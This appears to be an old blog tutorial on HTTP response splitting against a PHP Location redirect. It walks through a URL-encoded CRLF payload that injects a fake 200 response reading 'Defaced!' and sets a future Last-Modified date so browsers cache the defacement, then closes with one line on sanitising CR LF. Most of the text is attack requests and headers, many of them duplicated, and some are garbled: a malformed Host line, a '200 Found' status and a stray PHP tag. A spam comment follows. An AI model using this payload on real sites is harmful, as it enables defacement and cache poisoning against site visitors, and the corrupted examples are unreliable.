HTTP Response Splitting is a fairly new type of Web App security vulnerability. The idea behind it is, you find a website that takes user submitted data, and writes it to the HTTP header. An example of this is a Location: redirect. Heres the PHP code that takes a website, and redirects you to it.
http://site.com/redirect.php?page=http://www.google.com
CODE :
header("Location: $_GET['page']");
?>
As you can see, the 'page' variable is passed to the Location header to redirect the user. Heres what the request and reply headers look like:
Request:
CODE :
GET /index.php?page=http://www.google.com\r\n
HTTP/1.1\r\n
Host: site.com\r\n
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n
Accept-Language: en-us,en;q=0.5\r\n
Accept-Encoding: gzip,deflate\r\n
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n
Keep-Alive: 300\r\n
Connection: keep-alive\r\n
\r\n
HTTP/1.1\r\n
Host: site.com\r\n
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n
Accept-Language: en-us,en;q=0.5\r\n
Accept-Encoding: gzip,deflate\r\n
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n
Keep-Alive: 300\r\n
Connection: keep-alive\r\n
\r\n
Reply: (302 Redirect)
CODE :
HTTP/1.1 302 Found\r\n
Date: Tue, 02 Oct 2007 1:40:00 GMT\r\n
Server: Apache/0.0.0 (Windows) PHP/0.0.0
Location: http://www.google.com\r\n
The users fake headers will be here
Keep-Alive: timeout=15, max=100\r\n
Connection: Keep-Alive\r\n
Transfer-Encoding: chunked\r\n
Content-Type: text/html\r\n
\r\n
Date: Tue, 02 Oct 2007 1:40:00 GMT\r\n
Server: Apache/0.0.0 (Windows) PHP/0.0.0
Location: http://www.google.com\r\n
The users fake headers will be here
Keep-Alive: timeout=15, max=100\r\n
Connection: Keep-Alive\r\n
Transfer-Encoding: chunked\r\n
Content-Type: text/html\r\n
\r\n
Now the server sends you to the requested URL (google.com):
CODE :
GET / HTTP/1.1
Host: www.google.com
Accept:text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Host: www.google.com
Accept:text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
The server will respond with a 200 Found response and show you the requested document, Google.com. Hopefully you noticed whats at the end of each line.
\r\n
Which is also represented as:
CR LF and,
%0d %0a
So, you should know how to fake headers. Basically, if you inject a CR LF in the header, you can inject your own and you have your attack. Now, what can be accomplished with this? Well, you can re-write the page. Allowing for XSS, HTML Injection, and you can even tell the browser to cache your 'defaced' page by setting either,
Last-Modified:
Cache-Control: or,
Pragma
To a date ahead of the current.
So, lets inject our own headers to rewrite the page and tell the browser to cache it.
Our Injection:
CODE :
\r\n
Content-Type: text/html\r\n
HTTP/1.1 OK\r\n
Content-Type: text/html\r\n
Last-Modified: 5 Oct 12:00:00 GMT\r\n
\r\n
Content-Type: text/html\r\n
HTTP/1.1 OK\r\n
Content-Type: text/html\r\n
Last-Modified: 5 Oct 12:00:00 GMT\r\n
\r\n
Defaced!
Heres what the request and reply headers look like:
Request:
CODE :
GET /index.php?page=%0d%0aContent-Type:%20text/html%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aLast-
Modified:%20Tue,%205%20Oct%202007%2012:00:00%20GMT%0d%0a%0d%0a%3Chtml%3E%3Ch1%3EDefaced!%3C/html%3E\r\n
HTTP/1.1\r\n
Host: http://site.com\r\n
Accept:text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n
Accept-Language: en-us,en;q=0.5\r\n
Accept-Encoding: gzip,deflate\r\n
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n
Keep-Alive: 300\r\n
Connection: keep-alive\r\n
\r\n
Modified:%20Tue,%205%20Oct%202007%2012:00:00%20GMT%0d%0a%0d%0a%3Chtml%3E%3Ch1%3EDefaced!%3C/html%3E\r\n
HTTP/1.1\r\n
Host: http://site.com\r\n
Accept:text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n
Accept-Language: en-us,en;q=0.5\r\n
Accept-Encoding: gzip,deflate\r\n
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n
Keep-Alive: 300\r\n
Connection: keep-alive\r\n
\r\n
Response: (302 Found)
CODE :
HTTP/1.1 302 Found
Normal header here
Date: Tue, 02 Oct 2007 1:40:00 GMT\r\n
Server: Apache/0.0.0 (Windows) PHP/0.0.0
Location:
Content-Type: text/html
HTTP/1.1 200 OK
Our response has been injected here
Content-Type: text/html
Our above code gets shown as the redirected page
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html
Normal header here
Date: Tue, 02 Oct 2007 1:40:00 GMT\r\n
Server: Apache/0.0.0 (Windows) PHP/0.0.0
Location:
Content-Type: text/html
HTTP/1.1 200 OK
Our response has been injected here
Content-Type: text/html
Defaced!
Our above code gets shown as the redirected page
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html
As you can see in the example above, the server runs the normal 302 response, then, our injected code gets placed instead of the redirect which will cause it to show on the page. Allowing for the payload of our choice. And as a bonus, it gets cached until the 5'th of October ;)
So up until that day, providing they don't clear their cache, they will see the defaced page.
Now, to protect yourself against this attack, be sure to sanitize input against:
CR LF
\r\n and,
%0d%0a
And any other forms of encoding for these characters before parsing them to the HTTP Headers.
Thanks. I wanted this! :)
ReplyDeleteThere is noticeably big money to understand this. I assume you’ve made certain nice points in functions also. white house market
ReplyDelete